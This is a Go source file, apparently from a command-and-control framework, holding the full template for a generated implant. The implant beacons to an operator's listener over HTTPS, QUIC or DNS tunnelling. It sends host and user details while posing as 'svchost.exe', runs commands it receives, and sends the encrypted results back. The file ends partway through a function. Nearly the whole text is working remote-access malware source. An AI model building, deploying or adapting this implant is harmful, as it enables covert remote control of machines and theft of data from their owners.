package builder

import (
	"bytes"
	"text/template"
)

// implantTemplate es el esqueleto del archivo main.go que se genera para
// cada build. Despacha en runtime según el esquema de ListenerURL:
//
//   - http://  o https://  → transporte HTTP(S) con perfil maleable HTTP
//   - dns://               → transporte DNS con perfil maleable DNS
//
// Inyecta la configuración como constantes de paquete para que el
// compilador las hornee en el binario.
//
// DEBUG: define RTC2_DEBUG=1 en el entorno del implante para que emita
// logs de diagnóstico a stderr. Sin esa variable, el implante es silencioso.
//
// TLS: la CA del server (CACertPEMBase64) se incrusta en el binario.
// El implante confía exclusivamente en esa CA, no en el trust store del
// sistema operativo. Esto evita MITM por CAs instaladas en el host.
//
// IMPORTANTE: este es el ÚNICO lugar donde vive el código del implante.
// No existe un cmd/implant/main.go paralelo; el implante se genera
// dinámicamente en cada build. Cualquier cambio de comportamiento debe
// hacerse aquí.
const implantTemplate = `// Code generated by rtc2 builder. DO NOT EDIT.
// BuildID: {{ .BuildID }}
// BuiltAt: {{ .BuiltAt }}
//go:build {{ .GoBuildTag }}

package main

import (
	"bytes"
	"context" 
	"crypto/ecdh"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"math/big"
	"net"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"runtime"
	"strings"
	"time"

	"github.com/miekg/dns"
	"github.com/quic-go/quic-go" 
	"github.com/uLl0a/lavianc2/internal/crypto"
	"github.com/uLl0a/lavianc2/internal/profiles"
	"github.com/uLl0a/lavianc2/internal/protocol"
)

// ---- Configuración inyectada en build time ----
const (
	BuildID         = "{{ .BuildID }}"
	ListenerURL     = "{{ .ListenerURL }}"
	ProfileName     = "{{ .ProfileName }}"
	ServerPubKey    = "{{ .ServerPubKey }}"
	CACertPEMBase64 = "{{ .CACertPEMBase64 }}"
	SleepSecs       = {{ .SleepSecs }}
	JitterPerc      = {{ .JitterPerc }}
	Format          = "{{ .Format }}"
)

var (
	sleepSecs  = SleepSecs
	jitterPerc = JitterPerc

	// debugEnabled controla si se emiten logs de diagnóstico a stderr.
	// Se activa con la variable de entorno RTC2_DEBUG=1 (o cualquier
	// valor no vacío). En operaciones reales debe quedar desactivado.
	debugEnabled = os.Getenv("RTC2_DEBUG") != ""
)

func debugLog(format string, args ...any) {
	if !debugEnabled {
		return
	}
	ts := time.Now().UTC().Format("2006-01-02T15:04:05.000Z")
	fmt.Fprintf(os.Stderr, "[rtc2 %s] %s\n", ts, fmt.Sprintf(format, args...))
}

func fatalExit(reason string, err error) {
	if err != nil {
		debugLog("FATAL: %s: %v", reason, err)
	} else {
		debugLog("FATAL: %s", reason)
	}
	os.Exit(1)
}

// truncate devuelve los primeros n caracteres de s, con "..." si se truncó.
func truncate(s string, n int) string {
	if len(s) <= n {
		return s
	}
	return s[:n] + "..."
}

func main() {
	debugLog("arrancando implante build=%s listener=%s profile=%s",
		BuildID, ListenerURL, ProfileName)

	u, err := url.Parse(ListenerURL)
	if err != nil || u.Scheme == "" {
		fatalExit("ListenerURL inválida", err)
	}

	switch u.Scheme {
	case "dns":
		runDNS()
	case "http", "https":
		runHTTP()
	case "quic":
		runQUIC()
	default:
		fatalExit("esquema no soportado: "+u.Scheme, nil)
	}
}

// ════════════════════════════════════════════════════════════════════
// TLS pinneado: el implante confía SOLO en la CA incrustada en el
// binario, no en el trust store del sistema operativo.
// ════════════════════════════════════════════════════════════════════

func newHTTPClient() (*http.Client, error) {
	caPEM, err := base64.StdEncoding.DecodeString(CACertPEMBase64)
	if err != nil {
		return nil, fmt.Errorf("decodificar CA: %w", err)
	}

	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return nil, fmt.Errorf("CA PEM inválida (AppendCertsFromPEM falló)")
	}

	tlsCfg := &tls.Config{
		RootCAs:    pool,
		MinVersion: tls.VersionTLS13,
		// No hace falta ServerName explícito: Go lo deriva del URL.
		// El SAN del server debe incluir el host del ListenerURL.
	}

	transport := &http.Transport{
		TLSClientConfig:     tlsCfg,
		MaxIdleConns:        10,
		MaxIdleConnsPerHost: 4,
		IdleConnTimeout:     90 * time.Second,
		TLSHandshakeTimeout: 15 * time.Second,
	}

	return &http.Client{
		Timeout:   30 * time.Second,
		Transport: transport,
	}, nil
}

// ════════════════════════════════════════════════════════════════════
// Transporte HTTP / HTTPS
// ════════════════════════════════════════════════════════════════════

func runHTTP() {
	debugLog("modo HTTP, cargando perfil %q", ProfileName)
	registry := profiles.NewRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake")
			s, id, err := performHandshakeHTTP(profile)
			if err != nil {
				debugLog("handshake falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id
			debugLog("handshake OK implant_id=%s", implantID)
		}

		if err := beaconHTTP(profile, implantID, sc); err != nil {
			debugLog("beacon falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeHTTP(profile *profiles.Profile) (*crypto.SessionCrypto, string, error) {
	debugLog("handshake: generando par ECDH")
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", fmt.Errorf("generar par ECDH: %w", err)
	}
	debugLog("handshake: pub implante=%s", truncate(base64.StdEncoding.EncodeToString(pub.Bytes()), 16))

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)
	envBytes, _ := env.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(envBytes))
	if err != nil {
		return nil, "", fmt.Errorf("crear request: %w", err)
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	debugLog("handshake: POST %s (%d bytes)", ListenerURL, len(envBytes))
	client, err := newHTTPClient()
	if err != nil {
		return nil, "", fmt.Errorf("crear http client: %w", err)
	}
	resp, err := client.Do(httpReq)
	if err != nil {
		return nil, "", fmt.Errorf("POST falló: %w", err)
	}
	defer resp.Body.Close()
	debugLog("handshake: respuesta HTTP %d", resp.StatusCode)

	body, _ := io.ReadAll(resp.Body)
	debugLog("handshake: body recibido (%d bytes)", len(body))

	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return nil, "", fmt.Errorf("unmarshal envelope: %w", err)
	}
	debugLog("handshake: envelope tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", fmt.Errorf("unmarshal checkin response: %w", err)
	}
	debugLog("handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", fmt.Errorf("decode server_pub: %w", err)
	}

	debugLog("handshake: verificando pinning contra ServerPubKey")
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey)
	if err != nil {
		return nil, "", fmt.Errorf("derivar claves: %w", err)
	}
	debugLog("handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconHTTP(profile *profiles.Profile, implantID string, sc *crypto.SessionCrypto) error {
	debugLog("beacon: preparando poll")
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return fmt.Errorf("cifrar poll: %w", err)
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)
	envBytes, _ := env.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(envBytes))
	if err != nil {
		return err
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	client, err := newHTTPClient()
	if err != nil {
		return fmt.Errorf("crear http client: %w", err)
	}
	resp, err := client.Do(httpReq)
	if err != nil {
		return fmt.Errorf("POST poll: %w", err)
	}
	defer resp.Body.Close()
	debugLog("beacon: poll HTTP %d", resp.StatusCode)

	body, _ := io.ReadAll(resp.Body)
	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return fmt.Errorf("unmarshal respuesta: %w", err)
	}
	debugLog("beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("beacon: server pide rekey")
		return handleRekeyRequestHTTP(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("tipo de respuesta inesperado: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("descifrar respuesta: %w", err)
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return fmt.Errorf("unmarshal tareas: %w", err)
	}
	debugLog("beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("beacon: tarea %d/%d id=%s cmd=%s args=%v", i+1, len(tasks), t.ID, t.Command, t.Args)
		output, errMsg := executeTask(t.Command, t.Args)
		debugLog("beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		result := protocol.TaskResultWire{TaskID: t.ID, Output: output, Error: errMsg}
		resultJSON, _ := json.Marshal(result)
		encResult, err := sc.EncryptForC2(resultJSON, nil)
		if err != nil {
			debugLog("beacon: cifrar resultado falló: %v", err)
			continue
		}
		wrap := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResult}
		wrapJSON, _ := json.Marshal(wrap)
		resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
		resBytes, _ := resEnv.Marshal()

		req2, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(resBytes))
		if err != nil {
			debugLog("beacon: crear request resultado falló: %v", err)
			continue
		}
		profile.ApplyHeaders(req2)
		req2.Header.Set("Content-Type", "application/octet-stream")
		resp2, err := client.Do(req2)
		if err != nil {
			debugLog("beacon: enviar resultado falló: %v", err)
			continue
		}
		resp2.Body.Close()
		debugLog("beacon: resultado %s enviado, HTTP %d", t.ID, resp2.StatusCode)
	}

	return nil
}

// ════════════════════════════════════════════════════════════════════
// Transporte QUIC
// ════════════════════════════════════════════════════════════════════

func newQUICTLSConfig() (*tls.Config, error) {
	caPEM, err := base64.StdEncoding.DecodeString(CACertPEMBase64)
	if err != nil {
		return nil, fmt.Errorf("decodificar CA: %w", err)
	}
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return nil, fmt.Errorf("CA PEM inválida")
	}
	return &tls.Config{
		RootCAs:    pool,
		MinVersion: tls.VersionTLS13,
		// ServerName lo rellena el caller con el host del ListenerURL.
	}, nil
}

// quicHostFromURL extrae "host:port" del ListenerURL (esquema quic://).
func quicHostFromURL() (string, error) {
	u, err := url.Parse(ListenerURL)
	if err != nil {
		return "", err
	}
	if u.Host == "" {
		return "", fmt.Errorf("quic: listener url sin host")
	}
	return u.Host, nil
}

func runQUIC() {
	debugLog("modo QUIC, cargando perfil %q", ProfileName)
	registry := profiles.NewQUICRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil QUIC no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake QUIC")
			s, id, err := performHandshakeQUIC(profile)
			if err != nil {
				debugLog("handshake QUIC falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id
			debugLog("handshake QUIC OK implant_id=%s", implantID)
		}

		if err := beaconQUIC(profile, implantID, sc); err != nil {
			debugLog("beacon QUIC falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeQUIC(profile *profiles.QUICProfile) (*crypto.SessionCrypto, string, error) {
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", err
	}

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("quic handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)

	respEnv, err := exchangeQUIC(profile, env)
	if err != nil {
		return nil, "", err
	}

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", err
	}
	debugLog("quic handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", err
	}
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("quic handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey)
	if err != nil {
		return nil, "", err
	}
	debugLog("quic handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconQUIC(profile *profiles.QUICProfile, implantID string, sc *crypto.SessionCrypto) error {
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)

	respEnv, err := exchangeQUIC(profile, env)
	if err != nil {
		return err
	}
	debugLog("quic beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("quic beacon: server pide rekey")
		return handleRekeyRequestQUIC(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("respuesta inesperada: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return err
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return err
	}
	debugLog("quic beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("quic beacon: tarea %d/%d id=%s cmd=%s", i+1, len(tasks), t.ID, t.Command)
		output, errMsg := executeTask(t.Command, t.Args)
		debugLog("quic beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		result := protocol.TaskResultWire{TaskID: t.ID, Output: output, Error: errMsg}
		resultJSON, _ := json.Marshal(result)
		encResult, err := sc.EncryptForC2(resultJSON, nil)
		if err != nil {
			continue
		}
		wrap := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResult}
		wrapJSON, _ := json.Marshal(wrap)
		resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
		_, _ = exchangeQUIC(profile, resEnv)
		debugLog("quic beacon: resultado %s enviado", t.ID)
	}

	return nil
}

// exchangeQUIC abre una conexión QUIC nueva, envía el envelope en un
// stream, cierra el write side, lee la respuesta hasta EOF, y cierra.
func exchangeQUIC(profile *profiles.QUICProfile, env *protocol.Envelope) (*protocol.Envelope, error) {
	host, err := quicHostFromURL()
	if err != nil {
		return nil, err
	}

	tlsCfg, err := newQUICTLSConfig()
	if err != nil {
		return nil, err
	}
	tlsCfg.NextProtos = profile.ALPN
	// ServerName = host sin puerto.
	if h, _, err := net.SplitHostPort(host); err == nil {
		tlsCfg.ServerName = h
	} else {
		tlsCfg.ServerName = host
	}

	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
	defer cancel()

	quicCfg := &quic.Config{
		MaxIdleTimeout:  profile.MaxIdleTimeout,
		KeepAlivePeriod: profile.KeepAlivePeriod,
	}

	conn, err := quic.DialAddr(ctx, host, tlsCfg, quicCfg)
	if err != nil {
		return nil, fmt.Errorf("quic dial: %w", err)
	}
	defer conn.CloseWithError(0, "")

	stream, err := conn.OpenStreamSync(ctx)
	if err != nil {
		return nil, fmt.Errorf("quic open stream: %w", err)
	}

	envBytes, _ := env.Marshal()
	if _, err := stream.Write(envBytes); err != nil {
		return nil, fmt.Errorf("quic write: %w", err)
	}
	_ = stream.Close() // cierra write side, read sigue abierto

	_ = stream.SetReadDeadline(time.Now().Add(30 * time.Second))
	respBytes, err := io.ReadAll(stream)
	if err != nil {
		return nil, fmt.Errorf("quic read: %w", err)
	}

	respEnv, err := protocol.UnmarshalEnvelope(respBytes)
	if err != nil {
		return nil, fmt.Errorf("quic unmarshal: %w", err)
	}
	return respEnv, nil
}

func handleRekeyRequestQUIC(
	profile *profiles.QUICProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)

	respEnv, err := exchangeQUIC(profile, resEnv)
	if err != nil {
		return err
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		return err
	}
	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("quic rekey: tipo inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("quic rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("quic rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey QUIC: ack OK, rekey completo")
	return nil
}

func runDNS() {
	debugLog("modo DNS, cargando perfil %q", ProfileName)
	registry := profiles.NewDNSRegistry()
	profile, err := registry.Get(ProfileName)
	if err != nil {
		fatalExit("perfil DNS no encontrado", err)
	}

	var (
		sc        *crypto.SessionCrypto
		implantID string
	)

	iteration := 0
	for {
		iteration++
		debugLog("iteración #%d (sc=%v implantID=%q)", iteration, sc != nil, implantID)

		if sc == nil {
			debugLog("sin sesión, haciendo handshake DNS")
			s, id, err := performHandshakeDNS(profile)
			if err != nil {
				debugLog("handshake DNS falló: %v — reintentando en 30s", err)
				time.Sleep(30 * time.Second)
				continue
			}
			sc = s
			implantID = id
			debugLog("handshake DNS OK implant_id=%s", implantID)
		}

		if err := beaconDNS(profile, implantID, sc); err != nil {
			debugLog("beacon DNS falló: %v — reseteando sesión", err)
			sc = nil
			implantID = ""
		}

		sleepWithJitter()
	}
}

func performHandshakeDNS(profile *profiles.DNSProfile) (*crypto.SessionCrypto, string, error) {
	debugLog("dns handshake: generando par ECDH")
	priv, pub, err := crypto.GenerateKeyPair()
	if err != nil {
		return nil, "", err
	}

	hostname, _ := os.Hostname()
	sessionKey := randomSessionKey()
	debugLog("dns handshake: session_key=%s hostname=%s", sessionKey, hostname)

	req := map[string]any{
		"session_key": sessionKey,
		"hostname":    hostname,
		"username":    os.Getenv("USERNAME"),
		"os":          runtime.GOOS,
		"arch":        runtime.GOARCH,
		"pid":         os.Getpid(),
		"process":     "svchost.exe",
		"public_key":  base64.StdEncoding.EncodeToString(pub.Bytes()),
	}
	payload, _ := json.Marshal(req)
	env := protocol.NewEnvelope(protocol.MsgCheckin, payload)

	// En el check-in aún no tenemos implant_id. Usamos el session_key corto
	// como identificador en el QNAME; el server lo usa como clave de
	// acumulación de chunks y para el lookup del implante.
	respEnv, err := exchangeDNS(profile, env, sessionKey)
	if err != nil {
		return nil, "", err
	}

	var checkinResp struct {
		ServerPub string ` + "`json:\"server_pub\"`" + `
		SessionID string ` + "`json:\"implant_id\"`" + `
		Sleep     int    ` + "`json:\"sleep\"`" + `
		Jitter    int    ` + "`json:\"jitter\"`" + `
	}
	if err := json.Unmarshal(respEnv.Payload, &checkinResp); err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: server_pub=%s implant_id=%s sleep=%d jitter=%d",
		truncate(checkinResp.ServerPub, 16), checkinResp.SessionID,
		checkinResp.Sleep, checkinResp.Jitter)

	serverPub, err := decodeServerPub(checkinResp.ServerPub)
	if err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: verificando pinning")
	if err := verifyServerPubKey(serverPub); err != nil {
		return nil, "", fmt.Errorf("pinning falló: %w", err)
	}
	debugLog("dns handshake: pinning OK")

	sc, err := crypto.NewSessionCryptoAsBeacon(priv, serverPub, sessionKey)
	if err != nil {
		return nil, "", err
	}
	debugLog("dns handshake: claves derivadas OK")

	if checkinResp.Sleep > 0 {
		sleepSecs = checkinResp.Sleep
	}
	if checkinResp.Jitter > 0 {
		jitterPerc = checkinResp.Jitter
	}

	return sc, checkinResp.SessionID, nil
}

func beaconDNS(profile *profiles.DNSProfile, implantID string, sc *crypto.SessionCrypto) error {
	debugLog("dns beacon: preparando poll")
	empty, _ := json.Marshal(map[string]any{})
	encEmpty, err := sc.EncryptForC2(empty, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encEmpty}
	pollPayload, _ := json.Marshal(wrapper)
	env := protocol.NewEnvelope(protocol.MsgTaskPull, pollPayload)

	respEnv, err := exchangeDNS(profile, env, implantID)
	if err != nil {
		return err
	}
	debugLog("dns beacon: respuesta tipo=%d len=%d", respEnv.Type, len(respEnv.Payload))

	if respEnv.Type == protocol.MsgKeyRotation {
		debugLog("dns beacon: server pide rekey")
		return handleRekeyRequestDNS(profile, implantID, sc, respEnv.Payload)
	}
	if respEnv.Type != protocol.MsgTaskDispatch {
		return fmt.Errorf("respuesta inesperada: %d", respEnv.Type)
	}

	decrypted, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return err
	}

	var tasks []protocol.TaskWire
	if err := json.Unmarshal(decrypted, &tasks); err != nil {
		return err
	}
	debugLog("dns beacon: %d tareas recibidas", len(tasks))

	for i, t := range tasks {
		debugLog("dns beacon: tarea %d/%d id=%s cmd=%s", i+1, len(tasks), t.ID, t.Command)
		output, errMsg := executeTask(t.Command, t.Args)
		debugLog("dns beacon: tarea %s ejecutada, output=%d bytes err=%q", t.ID, len(output), errMsg)

		result := protocol.TaskResultWire{TaskID: t.ID, Output: output, Error: errMsg}
		resultJSON, _ := json.Marshal(result)
		encResult, err := sc.EncryptForC2(resultJSON, nil)
		if err != nil {
			continue
		}
		wrap := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResult}
		wrapJSON, _ := json.Marshal(wrap)
		resEnv := protocol.NewEnvelope(protocol.MsgTaskResult, wrapJSON)
		// No necesitamos la respuesta; ignoramos el retorno.
		if _, err := exchangeDNS(profile, resEnv, implantID); err != nil {
			debugLog("dns beacon: enviar resultado %s falló: %v", t.ID, err)
			continue  // dejamos la tarea como está; el server la reintentará
		}
		debugLog("dns beacon: resultado %s enviado", t.ID)
	}

	return nil
}

// exchangeDNS envía un envelope troceado en queries DNS y devuelve el
// envelope de respuesta que el server entrega en la última query.
//
// El envelope se codifica una sola vez con el perfil (base32 por defecto) y
// el string resultante se trocea en labels de tamaño ≤ MaxLabelSize. Cada
// trozo viaja en el slot X del QNAME; el server los reensambla en orden y
// procesa el envelope cuando llega el último.
func exchangeDNS(profile *profiles.DNSProfile, env *protocol.Envelope, sessionID string) (*protocol.Envelope, error) {
	envBytes, err := env.Marshal()
	if err != nil {
		return nil, err
	}
	encoded := profile.EncodeData(envBytes)

	chunks := splitChunks(encoded, profile.MaxLabelSize)
	if len(chunks) > profile.MaxChunks {
		return nil, fmt.Errorf("dns: envelope demasiado grande: %d chunks (max %d)",
			len(chunks), profile.MaxChunks)
	}
	total := len(chunks)
	debugLog("dns exchange: envelope tipo=%d encoded=%d bytes → %d chunks", env.Type, len(encoded), total)

	var lastAnswer string
	for seq, chunk := range chunks {
		qname := buildDNSQNAME(profile, chunk, seq, total, sessionID)
		debugLog("dns exchange: query %d/%d qname=%s", seq+1, total, qname)

		answer, err := queryDNSTXT(qname)
		if err != nil {
			return nil, err
		}
		debugLog("dns exchange: respuesta chunk %d: %q", seq, truncate(answer, 40))
		if answer == "err" {
			return nil, fmt.Errorf("dns: server reportó error en chunk %d", seq)
		}
		if seq == total-1 {
			lastAnswer = answer
		}
	}

	if lastAnswer == "" || lastAnswer == "ack" {
		return nil, fmt.Errorf("dns: respuesta vacía (%q)", lastAnswer)
	}

	respEnvBytes, err := profile.DecodeData(lastAnswer)
	if err != nil {
		return nil, fmt.Errorf("dns: decodificar respuesta: %w", err)
	}
	return protocol.UnmarshalEnvelope(respEnvBytes)
}

// buildDNSQNAME sustituye los placeholders del perfil. El chunk ya viene
// codificado: NO se re-encodea.
func buildDNSQNAME(profile *profiles.DNSProfile, chunk string, seq, total int, sessionID string) string {
	format := profile.Format
	format = strings.ReplaceAll(format, "{seq}", fmt.Sprintf("%x", seq))
	format = strings.ReplaceAll(format, "{total}", fmt.Sprintf("%x", total))
	format = strings.ReplaceAll(format, "{id}", sessionID)
	format = strings.ReplaceAll(format, "X", chunk)
	return format + "." + profile.Domain
}

// splitChunks trocea s en trozos de tamaño maxLen. Si s está vacío,
// devuelve un slice con un string vacío para que siempre haya al menos
// una query.
func splitChunks(s string, maxLen int) []string {
	if maxLen <= 0 {
		maxLen = 63
	}
	if s == "" {
		return []string{""}
	}
	var chunks []string
	for i := 0; i < len(s); i += maxLen {
		end := i + maxLen
		if end > len(s) {
			end = len(s)
		}
		chunks = append(chunks, s[i:end])
	}
	return chunks
}

// queryDNSTXT envía una query TXT y devuelve el primer string del primer
// registro TXT de la respuesta.
//
// La dirección del resolver se extrae de ListenerURL (ej: dns://1.2.3.4:53).
// Si no hay puerto, se asume 53.
func queryDNSTXT(qname string) (string, error) {
	u, err := url.Parse(ListenerURL)
	if err != nil {
		return "", fmt.Errorf("dns: parse listener url: %w", err)
	}
	server := u.Host
	if server == "" {
		return "", fmt.Errorf("dns: listener url sin host")
	}
	if !strings.Contains(server, ":") {
		server += ":53"
	}

	m := new(dns.Msg)
	m.SetQuestion(dns.Fqdn(qname), dns.TypeTXT)
	m.RecursionDesired = true

	c := &dns.Client{Timeout: 10 * time.Second}
	r, _, err := c.Exchange(m, server)
	if err != nil {
		return "", err
	}
	if r == nil {
		return "", fmt.Errorf("dns: respuesta nula")
	}
	if r.Rcode != dns.RcodeSuccess {
		// El server usa NXDOMAIN para "nada pendiente"; no es fatal.
		return "", nil
	}

	for _, rr := range r.Answer {
		if txt, ok := rr.(*dns.TXT); ok {
			if len(txt.Txt) > 0 {
				return strings.Join(txt.Txt, ""), nil
			}
		}
	}
	return "", nil
}

func decodeServerPub(b64 string) (*ecdh.PublicKey, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, fmt.Errorf("server_pub no es base64: %w", err)
	}
	return crypto.PublicKeyFromBytes(raw)
}

// verifyServerPubKey comprueba que la clave pública del server coincide con
// la pinnada en build time (ServerPubKey). Sin esto, un MITM en el primer
// check-in puede inyectar su propia clave y quedarse en medio.
func verifyServerPubKey(serverPub *ecdh.PublicKey) error {
	pinnedBytes, err := base64.StdEncoding.DecodeString(ServerPubKey)
	if err != nil {
		return fmt.Errorf("ServerPubKey no es base64: %w", err)
	}
	pinned, err := crypto.PublicKeyFromBytes(pinnedBytes)
	if err != nil {
